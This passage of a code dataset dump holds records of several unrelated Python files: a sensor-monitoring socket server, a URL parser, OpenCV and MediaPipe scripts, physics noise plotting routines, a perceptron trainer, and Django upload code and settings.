plt.savefig(outputfilep, dpi=300)\n # plt.show()\n plt.close()\n","repo_name":"mlosch/FeatureSharing","sub_path":"featuresharing/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38128154545","text":"import socket\nfrom queue import Queue\nfrom threading import Thread, Lock\nfrom lib.sensor_status import SensorService\n\n\nSEND_REQUEST = \"START_SEND\"\nSTOP_REQUEST = \"STOP_SEND\"\n\nclass ClientMetaInfo:\n def __init__(self, address, queue, id=-1):\n self.address = address\n self.queue = queue\n self.id = id\n\nclass MonitorServer:\n _host = socket.gethostname()\n _port = 2004\n _send_request_lock = Lock()\n \n def __init__(self, sensor_service:SensorService):\n self.sensor_service = sensor_service\n self.list_of_clients = []\n self.monitor_image = open(\"monitor/__demo/empty-image.jpg\", \"rb\").read()\n\n\n def make_request_from_client(self, client_id, request):\n for client in self.list_of_clients:\n if (client.id == client_id):\n if request==SEND_REQUEST: self.stop_all_sending() # TODO Hacky, refactor\n client.queue.put(request)\n \n \n def reset_send_request(self):\n self.send_request_id = -1\n\n\n def multi_threaded_client(self, connection, client_info:ClientMetaInfo):\n connection.send(str.encode('Server is working:'))\n current_status = None\n while True:\n #Check if any messages from app: \n try:\n req = client_info.queue.get_nowait()\n except:\n req = ''\n \n try:\n #Check for data from client\n data = connection.recv(3)\n \n message_type = data.decode('utf-8')\n if(message_type==\"INF\"):\n client_message = 
connection.recv(500).decode('utf-8')\n # Update the current status\n current_status = self.sensor_service.parse_status(client_message)\n\n elif (message_type==\"IMG\"):\n self.monitor_image = connection.recv(500000)\n \n response = \"OK\"\n if current_status is not None:\n # Bind an id to our meta address\n if client_info.id == -1:\n client_info.id = int(current_status.sensor_id)\n\n # Manage any request to client\n if req != '': \n response = \",\".join([response, req])\n \n connection.sendall(str.encode(response))\n except Exception as e:\n self.sensor_service.reset_status(current_status)\n print(e)\n break\n connection.close()\n\n def run_info_server(self):\n ServerSideSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n ServerSideSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n ThreadCount = 0\n\n try:\n ServerSideSocket.bind((self._host, self._port))\n except socket.error as e:\n exit()\n\n print('Socket is listening..')\n ServerSideSocket.listen(5)\n\n try: \n while True:\n Client, address = ServerSideSocket.accept()\n new_client_queue = Queue(maxsize=5)\n new_client_info = ClientMetaInfo(address, new_client_queue)\n self.list_of_clients.append(new_client_info)\n \n new_thread = Thread(target=self.multi_threaded_client, args=(Client, new_client_info, ))\n ThreadCount += 1\n new_thread.start()\n \n except socket.error as e:\n print(f\"SERVER EXCEPTION : {str(e)}\")\n finally:\n ServerSideSocket.close()\n\n def get_all_sensor_stats(self):\n return self.sensor_service.get_all_sensor_stats()\n \n def get_sensor_stats(self, id):\n return self.sensor_service.get_sensor_stats(id)\n \n def get_monitor_image(self):\n return self.monitor_image\n \n def stop_all_sending(self):\n for client in self.list_of_clients:\n self.make_request_from_client(client.id, STOP_REQUEST)\n\nif __name__ == \"__main__\":\n def test_request(ms):\n import time\n for i in range(10):\n time.sleep(5)\n ms.make_request_from_client(3, STOP_REQUEST)\n ms.make_request_from_client(3, SEND_REQUEST)\n time.sleep(5)\n ms.make_request_from_client(3, STOP_REQUEST)\n\n sensor_service = SensorService()\n ms = MonitorServer(sensor_service)\n test_thread = Thread(target=test_request, args=(ms, ))\n test_thread.start()\n ms.run_info_server()\n ","repo_name":"apajovic/ip_forest_monitor","sub_path":"ForestMonitor/monitor/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22926507335","text":"# encoding: utf-8\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)\n#\n\nfrom mo_dots import Data, Null, coalesce, is_data, is_list, wrap\nfrom mo_future import PY2, is_text, text, unichr, urlparse, is_binary\nfrom mo_json import json2value, value2json\nfrom mo_logs import Log\n\n\nclass URL(object):\n \"\"\"\n JUST LIKE urllib.parse() [1], BUT CAN HANDLE JSON query PARAMETERS\n\n [1] https://docs.python.org/3/library/urllib.parse.html\n \"\"\"\n\n def __new__(cls, value, *args, **kwargs):\n if isinstance(value, URL):\n return value\n else:\n return object.__new__(cls)\n\n def __init__(self, value, port=None, path=None, query=None, fragment=None):\n if isinstance(value, URL):\n return\n try:\n self.scheme = None\n self.host = None\n self.port = port\n self.path = path\n self.query = query\n self.fragment = fragment\n\n if value == None:\n return\n\n if value.startswith(\"file://\") or value.startswith(\"//\"):\n # urlparse DOES NOT WORK IN THESE CASES\n scheme, suffix = value.split(\"//\", 2)\n self.scheme = scheme.rstrip(\":\")\n parse(self, suffix, 0, 1)\n self.query = wrap(url_param2value(self.query))\n else:\n output = urlparse(value)\n self.scheme = output.scheme\n self.port = coalesce(port, output.port)\n self.host = output.netloc.split(\":\")[0]\n self.path = coalesce(path, output.path)\n self.query = coalesce(query, wrap(url_param2value(output.query)))\n self.fragment = coalesce(fragment, output.fragment)\n except Exception as e:\n Log.error(u\"problem parsing {{value}} to URL\", value=value, cause=e)\n\n def __nonzero__(self):\n if self.scheme or self.host or self.port or self.path or self.query or self.fragment:\n return True\n return False\n\n def __bool__(self):\n if self.scheme or self.host or self.port or self.path or self.query or self.fragment:\n return True\n return False\n\n def __truediv__(self, other):\n if not is_text(other):\n Log.error(u\"Expecting text path\")\n output = self.__copy__()\n output.path = output.path.rstrip('/') + \"/\" + other.lstrip('/')\n return output\n\n def __unicode__(self):\n return self.__str__().decode('utf8') # ASSUME chr<128 ARE VALID UNICODE\n\n def __copy__(self):\n output = URL(None)\n output.scheme = self.scheme\n output.host = self.host\n output.port = self.port\n output.path = self.path\n output.query = self.query\n output.fragment = self.fragment\n return output\n\n def decode(self, encoding=''):\n return text(self).decode(encoding)\n\n def __data__(self):\n return str(self)\n\n def __str__(self):\n url = \"\"\n if self.host:\n url = self.host\n if self.scheme:\n url = self.scheme + \"://\"+url\n if self.port:\n url = url + \":\" + str(self.port)\n if self.path:\n if self.path[0] == text(\"/\"):\n url += str(self.path)\n else:\n url += \"/\" + str(self.path)\n if self.query:\n url = url + \"?\" + value2url_param(self.query)\n if self.fragment:\n url = url + \"#\" + value2url_param(self.fragment)\n return url\n\n\ndef int2hex(value, size):\n return ((\"0\" * size) + hex(value)[2:])[-size:]\n\n\ndef hex2chr(hex):\n try:\n return unichr(int(hex, 16))\n except Exception as e:\n raise e\n\nif PY2:\n _map2url = {chr(i): chr(i) for i in range(32, 128)}\n for c in \" {}<>;/?:@&=+$,\":\n _map2url[c] = \"%\" + str(int2hex(ord(c), 2))\n for i in range(128, 256):\n _map2url[chr(i)] = \"%\" + str(int2hex(i, 2))\nelse:\n _map2url = {i: unichr(i) for i in range(32, 128)}\n for c in b\" {}<>;/?:@&=+$,\":\n _map2url[c] = \"%\" + int2hex(c, 2)\n for i in 
range(128, 256):\n _map2url[i] = \"%\" + str(int2hex(i, 2))\n\n\nnames = [\"path\", \"query\", \"fragment\"]\nindicator = [\"/\", \"?\", \"#\"]\n\n\ndef parse(output, suffix, curr, next):\n if next == len(indicator):\n output.__setattr__(names[curr], suffix)\n return\n\n e = suffix.find(indicator[next])\n if e == -1:\n parse(output, suffix, curr, next + 1)\n else:\n output.__setattr__(names[curr], suffix[:e:])\n parse(output, suffix[e + 1::], next, next + 1)\n\n\ndef url_param2value(param):\n \"\"\"\n CONVERT URL QUERY PARAMETERS INTO DICT\n \"\"\"\n if param == None:\n return Null\n if param == None:\n return Null\n\n def _decode(v):\n output = []\n i = 0\n while i < len(v):\n c = v[i]\n if c == \"%\":\n d = hex2chr(v[i + 1:i + 3])\n output.append(d)\n i += 3\n else:\n output.append(c)\n i += 1\n\n output = text(\"\".join(output))\n try:\n return json2value(output)\n except Exception:\n pass\n return output\n\n query = Data()\n for p in param.split('&'):\n if not p:\n continue\n if p.find(\"=\") == -1:\n k = p\n v = True\n else:\n k, v = p.split(\"=\")\n v = _decode(v)\n\n u = query.get(k)\n if u is None:\n query[k] = v\n elif is_list(u):\n u += [v]\n else:\n query[k] = [u, v]\n\n return query\n\n\ndef value2url_param(value):\n \"\"\"\n :param value:\n :return: ascii URL\n \"\"\"\n if value == None:\n Log.error(\"Can not encode None into a URL\")\n\n if is_data(value):\n value_ = wrap(value)\n output = \"&\".join([\n value2url_param(k) + \"=\" + (value2url_param(v) if is_text(v) else value2url_param(value2json(v)))\n for k, v in value_.leaves()\n ])\n elif is_text(value):\n output = \"\".join(_map2url[c] for c in value.encode('utf8'))\n elif is_binary(value):\n output = \"\".join(_map2url[c] for c in value)\n elif hasattr(value, \"__iter__\"):\n output = \",\".join(value2url_param(v) for v in value)\n else:\n output = str(value)\n return output\n\n\n\n","repo_name":"mozilla/jx-sqlite","sub_path":"vendor/mo_files/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"21"} +{"seq_id":"21305518715","text":"import numpy as np\nimport tensorflow as tf\nimport cv2 as cv\nimport os\nimport argparse\n\nfrom object_detection.utils import label_map_util\n\nCWD_PATH = os.getcwd()\nMODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_17'\nPATH_TO_FROZEN_GRAPH = os.path.join(CWD_PATH, MODEL_NAME, 'frozen_inference_graph.pb')\nprint('the model:', PATH_TO_FROZEN_GRAPH)\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join(CWD_PATH, MODEL_NAME, 'ssd_mobilenet_v1_coco_2017_11_17.pbtxt')\n# PATH_TO_LABELS = os.path.join(CWD_PATH, 'object_detection', 'data','ssd_mobilenet_v1_coco_2017_11_17.pbtxt')\n# print(PATH_TO_LABELS)\n\ncvNet = cv.dnn.readNetFromTensorflow(PATH_TO_FROZEN_GRAPH, PATH_TO_LABELS)\n\n\ndef do_work(image_path):\n # img = cv.imread('images/example1.jpg')\n img = cv.imread(image_path)\n rows = img.shape[0]\n cols = img.shape[1]\n cvNet.setInput(cv.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False))\n cvOut = cvNet.forward()\n\n for detection in cvOut[0,0,:,:]:\n score = float(detection[2])\n if score > 0.3:\n left = detection[3] * cols\n top = detection[4] * rows\n right = detection[5] * cols\n bottom = detection[6] * rows\n cv.rectangle(img, (int(left), int(top)), (int(right), int(bottom)), (23, 230, 210), thickness=2)\n\n cv.imshow('img', img)\n cv.waitKey()\n\nif __name__ == '__main__':\n parser = 
argparse.ArgumentParser(description='Detect objects from an image')\n parser.add_argument('--image', metavar='path', required=True,\n help='The image path')\n args = parser.parse_args()\n do_work(args.image)\n\n","repo_name":"paolodoors/face_recognition_ocv","sub_path":"oda2.py","file_name":"oda2.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21940396370","text":"boys = []\ngirls = []\nboy_count = 0\ngirl_count = 0\nwith open('contacts.csv') as file:\n line = file.readline()\n while line:\n if line != '\\n':\n record = line.split(';')\n if record[3].rstrip() == 'M':\n boy_count += 1\n boys.append('\\t' + record[1] + ' ' + record[0])\n if record[3].rstrip() == 'V':\n girl_count += 1\n girls.append('\\t' + record[1] + ' ' + record[0])\n line = file.readline()\ngirls.sort()\nboys.sort()\nprint(girl_count, 'girls:')\nprint(*girls, sep='\\n')\nprint(boy_count, 'boys:')\nprint(*boys, sep='\\n')\n","repo_name":"jnoas123/python","sub_path":"oef text files 7/oef_8.py","file_name":"oef_8.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38575722123","text":"#!/usr/bin/python3\nimport noise_power_v1\nimport pandas as pd\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport os\nimport plotly.offline as py\nimport plotly.graph_objs as go\nimport plotly\nimport constants as c\n\n\ndef velocity_distribution_kde(chi, df,title=[]):\n \"\"\"Takes chi solutions which are already calculated and plots the KDE of the distribution in velocity space\n Parameters:\n chi (nparray): Numpy array containing a solution of the steady Boltzmann equation in chi form.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n title (str): String containing the desired name of the plot\n Returns:\n Nothing. 
Just the plots.\n \"\"\"\n vel = df['vx [m/s]']\n npts = 600 # number of points in the KDE\n vdist = np.zeros(npts)\n vdist_tot = np.zeros(npts)\n vdist_f0 = np.zeros(npts)\n # Need to define the energy range that I'm doing integration over\n # en_axis = np.linspace(enk.min(), enk.min() + 0.4, npts)\n v_ax = np.linspace(vel.min(), vel.max(), npts)\n dx = (v_ax.max() - v_ax.min()) / npts\n f0 = np.squeeze(df['k_FD'].values)\n spread = 22 * dx\n\n def gaussian(x, mu, sigma=spread):\n return (1 / (sigma * np.sqrt(2 * np.pi))) * np.exp((-1 / 2) * ((x - mu) / sigma) ** 2)\n for k in range(len(chi)):\n istart = int(np.maximum(np.floor((vel[k] - v_ax[0]) / dx) - (4 * spread / dx), 0))\n iend = int(np.minimum(np.floor((vel[k] - v_ax[0]) / dx) + (4 * spread / dx), npts - 1))\n vdist_tot[istart:iend] += (chi[k] + f0[k]) * gaussian(v_ax[istart:iend], vel[k])\n vdist_f0[istart:iend] += f0[k] * gaussian(v_ax[istart:iend], vel[k])\n vdist[istart:iend] += chi[k] * gaussian(v_ax[istart:iend], vel[k])\n\n plt.figure()\n ax = plt.axes([0.18, 0.15, 0.76, 0.76])\n ax.plot(v_ax, [0]*len(v_ax), 'k')\n ax.plot(v_ax, vdist_f0, '--', linewidth=2, label='Equilbrium')\n ax.plot(v_ax, vdist_tot, linewidth=2, label='Hot electron distribution')\n # plt.fill(v_ax, vdist, label='non-eq distr', color='red')\n ax.fill(v_ax, vdist, '--', linewidth=2, label='Non-equilibrium deviation', color='C1')\n ax.set_xlabel(r'Velocity [ms$^{-1}$]')\n ax.set_ylabel(r'Occupation [arb.]')\n plt.legend()\n if title:\n plt.title(title)\n\n\ndef plot_vel_KDEs(outLoc,field,df,plotRTA=True,plotLowField=True,plotFDM=True):\n \"\"\"Wrapper script for velocity_distribution_kde. Can do for the various solution schemes saved to file.\n Parameters:\n outLoc (str): String containing the location of the directory to write the chi solutions and ready steady state chis.\n field (dbl): the values of the electric field to be evaluated in V/m.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n\n Returns:\n Nothing. Just the plots.\n \"\"\"\n if plotRTA:\n f_i = np.load(outLoc + 'f_1.npy')\n chi_1_i = noise_power_v1.f2chi(f_i,df,field)\n velocity_distribution_kde(chi_1_i, df, title='RTA Chi {:.1e} V/m'.format(field))\n if plotLowField:\n f_i = np.load(outLoc + 'f_2.npy')\n chi_2_i = noise_power_v1.f2chi(f_i,df,field)\n velocity_distribution_kde(chi_2_i, df, title='Low Field Iterative Chi {:.1e} V/m'.format(field))\n if plotFDM:\n chi_3_i = np.load(outLoc + 'chi_3_{:.1e}.npy'.format(field))\n velocity_distribution_kde(chi_3_i, df, title='FDM Iterative Chi {:.1e} V/m'.format(field))\n\n\ndef plot_noise(outLoc,fieldVector,df,plotRTA=True,plotFDM=True):\n \"\"\"Wrapper script for noise_power. Can do for the various solution schemes saved to file.\n Parameters:\n outLoc (str): String containing the location of the directory to write the chi solutions and ready steady state chis.\n fieldVector (nparray): Vector containing the values of the electric field to be evaluated in V/m.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n\n Returns:\n Nothing. 
Just the plots.\n \"\"\"\n noise_1 = []\n noise_3 =[]\n Tn_1 = []\n Tn_3 = []\n\n for ee in fieldVector:\n if plotRTA:\n g_1_i = np.load(outLoc + 'g_1_{:.1e}.npy'.format(ee))\n noise_1.append(noise_power_v1.lowfreq_noise(g_1_i, df))\n f_i = np.load(outLoc + 'f_1.npy')\n mu_1 = noise_power_v1.calc_mobility(f_i,df)\n Tn_1.append(noise_power_v1.noiseT(in_Loc,noise_1[-1], mu_1, df))\n\n if plotFDM:\n g_3_i = np.load(outLoc + 'g_3_{:.1e}.npy'.format(ee))\n noise_3.append(noise_power_v1.lowfreq_noise(g_3_i, df))\n chi_3_i = np.load(outLoc + 'chi_3_{:.1e}.npy'.format(ee))\n mu_3 = (noise_power_v1.calc_diff_mobility(chi_3_i,df,ee))\n Tn_3.append(noise_power_v1.noiseT(in_Loc,noise_3[-1], mu_3, df))\n kvcm = np.array(fieldVector) * 1E-5\n plt.figure()\n if plotRTA:\n g_1_johnson = np.load(outLoc + 'g_1_johnson.npy')\n plt.plot(kvcm, noise_1, linewidth=2, label='RTA')\n plt.axhline(noise_power_v1.lowfreq_noise(g_1_johnson,df), color = 'black',linestyle='--',label='RTA Johnson')\n\n if plotFDM:\n plt.plot(kvcm, noise_3, linewidth=2, label='FDM')\n plt.axhline(noise_3[0], color = 'black',linestyle='--',label='FDM Johnson')\n\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Non-equilibrium diffusion coefficient [m^2/s]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, Tn_1, linewidth=2, label='RTA')\n\n if plotFDM:\n plt.plot(kvcm, Tn_3, linewidth=2, label='FDM')\n\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Noise Temperature [K]')\n plt.legend()\n\n\ndef driftvel_mobility_vs_field(outLoc,df,fieldVector,plotRTA=True,plotLowField=True,plotFDM=True):\n \"\"\"Takes chi solutions which are already calculated and plots drift velocity vs field\n Parameters:\n outLoc (str): String containing the location of the directory to write the chi solutions and ready steady state chis.\n fieldVector (nparray): Vector containing the values of the electric field to be evaluated in V/m.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n\n Returns:\n Nothing. 
Just the plots.\n \"\"\"\n if plotRTA:\n vd_1,meanE_1,n_1,mu_1,ng_1,nl_1 = ([] for i in range(6))\n if plotLowField:\n vd_2,meanE_2,n_2,mu_2,ng_2,nl_2 = ([] for i in range(6))\n if plotFDM:\n vd_3,meanE_3,n_3,mu_3,ng_3,nl_3 = ([] for i in range(6))\n\n for ee in fieldVector:\n if plotRTA:\n f_i = np.load(outLoc + 'f_1.npy')\n chi_1_i = noise_power_v1.f2chi(f_i, df, ee)\n vd_1.append(noise_power_v1.drift_velocity(chi_1_i,df))\n meanE_1.append(noise_power_v1.mean_energy(chi_1_i,df))\n n_1.append(noise_power_v1.calculate_noneq_density(chi_1_i,df))\n mu_1.append(noise_power_v1.calc_mobility(f_i,df)*10**4)\n ng_i,nl_i=noise_power_v1.calc_L_Gamma_pop(chi_1_i,df)\n ng_1.append(ng_i)\n nl_1.append(nl_i)\n if plotLowField:\n f_i = np.load(outLoc + 'f_2.npy')\n chi_2_i = noise_power_v1.f2chi(f_i, df, ee)\n vd_2.append(noise_power_v1.drift_velocity(chi_2_i,df))\n meanE_2.append(noise_power_v1.mean_energy(chi_2_i,df))\n n_2.append(noise_power_v1.calculate_noneq_density(chi_2_i,df))\n mu_2.append(noise_power_v1.calc_mobility(f_i,df)*10**4)\n ng_i,nl_i=noise_power_v1.calc_L_Gamma_pop(chi_2_i,df)\n ng_2.append(ng_i)\n nl_2.append(nl_i)\n if plotFDM:\n chi_3_i = np.load(outLoc + 'chi_3_{:.1e}.npy'.format(ee))\n vd_3.append(noise_power_v1.drift_velocity(chi_3_i,df))\n meanE_3.append(noise_power_v1.mean_energy(chi_3_i,df))\n n_3.append(noise_power_v1.calculate_noneq_density(chi_3_i,df))\n mu_3.append(noise_power_v1.calc_diff_mobility(chi_3_i,df,ee)*10**4)\n ng_i,nl_i=noise_power_v1.calc_L_Gamma_pop(chi_3_i,df)\n ng_3.append(ng_i)\n nl_3.append(nl_i)\n kvcm = np.array(fieldVector) * 1E-5\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, vd_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, vd_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, vd_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Drift velocity [m/s]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, n_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, n_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, n_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Carrier population [m^-3]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, meanE_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, meanE_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, meanE_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Mean energy [eV]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, mu_1, 'o-', linewidth=2, label='RTA')\n if plotLowField:\n plt.plot(kvcm, mu_2, linewidth=2, label='Low Field Iterative')\n if plotFDM:\n plt.plot(kvcm, mu_3, linewidth=2, label='FDM Iterative')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Mobility [$cm^2 V^{-1} s^{-1}$]')\n plt.legend()\n\n plt.figure()\n if plotRTA:\n plt.plot(kvcm, ng_1, 'o-', linewidth=2, label='RTA Gamma')\n plt.plot(kvcm, nl_1, 'o-', linewidth=2, label='RTA L')\n if plotLowField:\n plt.plot(kvcm, ng_2, linewidth=2, label='Low Field Iterative Gamma')\n plt.plot(kvcm, nl_2, linewidth=2, label='Low Field Iterative L')\n if plotLowField:\n plt.plot(kvcm, ng_3, linewidth=2, label='FDM Iterative Gamma')\n plt.plot(kvcm, nl_3, linewidth=2, label='FDM Iterative L')\n plt.xlabel('Field [kV/cm]')\n plt.ylabel(r'Carrier Population [m^-3]$]')\n plt.legend()\n\n\ndef plot_scattering_rates(inLoc,df,applyscmFac=False):\n \"\"\"Takes chi solutions which are 
already calculated and plots drift velocity vs field\n Parameters:\n inLoc (str): String containing the location of the directory containing the scattering matrix, assumed simple\n linearization by default.\n df (dataframe): Electron DataFrame indexed by kpt containing the energy associated with each state in eV.\n applyscmFac (bool): Boolean that specifies whether or not to apply the 2*pi squared factor.\n\n Returns:\n Nothing. Just the plots.\n \"\"\"\n if applyscmFac:\n scmfac = (2*np.pi)**2\n print('Applying 2 Pi-squared factor.')\n else:\n scmfac = 1\n scm = np.memmap(inLoc + 'scattering_matrix_5.87_simple.mmap', dtype='float64', mode='r', shape=(42433, 42433))\n rates = (-1) * np.diag(scm) * scmfac * 1E-12\n plt.figure()\n plt.plot(df['energy'], rates, '.', MarkerSize=3)\n plt.xlabel('Energy [eV]')\n plt.ylabel(r'Scattering rate [ps$^{-1}$]')\n\n\nif __name__ == '__main__':\n out_Loc = 'E:/Dropbox (Minnich Lab)/Alex_Peishi_Noise_Calcs/BoltzmannGreenFunctionNoise/#1_Problem/1_Pipeline/Output/'\n in_Loc = 'E:/Dropbox (Minnich Lab)/Alex_Peishi_Noise_Calcs/BoltzmannGreenFunctionNoise/#1_Problem/0_Data/'\n electron_df = pd.read_pickle(in_Loc+'electron_df.pkl')\n electron_df = noise_power_v1.fermi_distribution(electron_df)\n fields = np.array([1e1,2e1,3e1,4e1,5e1,6e1,7e1,8e1,9e1,1e2,2e2,3e2,4e2,5e2,6e2,7e2,8e2,9e2,2e3,4e3,6e3,8e3,1e4,2e4,4e4,6e4,8e4,1.1e5,1.2e5,1.3e5,1.4e5,1.5e5,1.6e5,1.7e5,1.8e5,1.9e5,2e5])\n driftvel_mobility_vs_field(out_Loc,electron_df,fields)\n plot_vel_KDEs(out_Loc, 1.8e5, electron_df, plotRTA=True, plotLowField=True, plotFDM=True)\n plot_scattering_rates(in_Loc, electron_df, applyscmFac=True)\n plot_noise(out_Loc, fields, electron_df, plotRTA=True, plotFDM=True)\n plt.show()","repo_name":"alexanderychoi/linear_boltzmann","sub_path":"archive/plotting_v1.py","file_name":"plotting_v1.py","file_ext":"py","file_size_in_byte":12187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9289172873","text":"import os\nimport sys\n\nsys.path.append(os.getcwd())\n\nimport cv2\nimport mediapipe as mp\nfrom models.preprocessing.mediapipe import pose_estimation\nimport numpy as np\nfrom mediapipe.framework.formats import landmark_pb2\n\n\n\nmp_holistic = mp.solutions.holistic\n\n# For webcam input:\ncap = cv2.VideoCapture()\ncap.open(\"data/template.mp4\")\n\nwith mp_holistic.Holistic(\n static_image_mode=True,\n model_complexity=2) as holistic:\n\n while cap.isOpened():\n\n success, image = cap.read()\n if not success:\n print(\"Ignoring empty camera frame.\")\n break\n\n image = pose_estimation(image, holistic)\n image = cv2.resize(image, (256, 256))\n cv2.imshow('MediaPipe Holistic', image)\n if cv2.waitKey(5) & 0xFF == 27:\n break\n\ncap.release()\n","repo_name":"WayenVan/SignLanguageTranslation","sub_path":"tests/mp.py","file_name":"mp.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10038190003","text":"import numpy as np\nimport pandas as pd\nfrom perceptron import Perceptron\nfrom time import time\nimport pickle\n\ndef step1_get_data() : \n # iris.data 파일에서 데이터를 읽어온다.\n df= pd.read_csv('./3.IrisPerceptron/iris.data', header=None)\n #print(df)\n #꽃잎 데이터를 추출한다.\n X=df.iloc[0:100, [2, 3]].values\n #print(x)\n #꽃 종류 데이터를 추출한다.\n y= df.iloc[0:100, 4].values\n y=np.where(y=='Iris-setosa',1,-1)\n #print(y)\n return X, y\ndef step2_learning() :\n ppn=Perceptron(eta=0.1)\n data=step1_get_data()\n X=data[0]\n y=data[1]\n 
# Train the model.\n    ppn.fit(X, y)\n    print(ppn.errors_)\n    print(ppn.w_)\n    # Save the trained object.\n    # Persist the fitted object to a file once training is done.\n    with open('./3.IrisPerceptron/perceptron.dat', 'wb') as fp:\n        pickle.dump(ppn, fp)\n    print(\"Training complete\")\ndef step3_using() :\n    # Restore the object from the file.\n    with open('./3.IrisPerceptron/perceptron.dat', 'rb') as fp:\n        ppn = pickle.load(fp)\n\n\n    while True :\n        a1 = input(\"Please enter the width: \")\n        a2 = input(\"Please enter the length: \")\n\n        X = np.array([float(a1),float(a2)])\n        result = ppn.predict(X)\n        if result ==1 :\n            print('Result: Iris-setosa')\n        else:\n            print('Result: Iris-versicolor')\n\n\n\n\n\n# if __name__ == \"__main__\":\n    # step1_get_data()\nstep2_learning()\nstep3_using()\n","repo_name":"y0ngma/python_basic","sub_path":"4MachineLearning/3.IrisPerceptron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"23998916094","text":"from django.shortcuts import render\n\nfrom .forms import ProfileForm\n\nIMAGE_FILE_TYPES = ['png', 'jpg', 'jpeg']\n\ndef create_profile(request):\n\n    if request.method == 'POST':\n\n        print('POST Request Received 1')\n\n        form = ProfileForm(request.POST, request.FILES)\n\n        if form.is_valid():\n\n            print('POST Request Received 2')\n\n            user_pr = form.save(commit=False)\n            user_pr.display_picture = request.FILES['display_picture']\n\n            file_type = user_pr.display_picture.url.split('.')[-1]\n            file_type = file_type.lower()\n\n            if file_type not in IMAGE_FILE_TYPES:\n                return render(request, 'error.html')\n\n            user_pr.save()\n            print('going to details')\n            return render(request, 'details.html', {'user_pr': user_pr})\n\n        else:\n            form = ProfileForm()\n            return render(request, 'create.html', {\"form\": form})\n\n    elif request.method == 'GET':\n\n        print('GET Request Received')\n\n        form = ProfileForm()\n        return render(request, 'create.html', {\"form\": form})\n","repo_name":"girishf15/DjangoFileUpload","sub_path":"userprofile/userprofile_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"32069970572","text":"import os\n\ndbPath = os.path.join(os.path.dirname(__file__), 'db.sqlite3')\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.postgresql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n        'NAME': os.getenv('POSTGRES_DB'),\n        'USER': os.getenv('POSTGRES_USER'),\n        'PASSWORD': os.getenv('POSTGRES_PASSWORD'),\n        'HOST': os.getenv('SYMPORTAL_DATABASE_CONTAINER'),\n        'PORT': '5432',\n#\t 'OPTIONS': {'timeout':200}\n    }\n}\n\n\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nCACHES = {\n    'default': {\n        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',\n    }\n}\n\n\nINSTALLED_APPS = (\n    'dbApp',\n    )\n\nSECRET_KEY = ''\n","repo_name":"reefgenomics/symportal-2.0","sub_path":"symportal_framework/settings_blank.py","file_name":"settings_blank.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
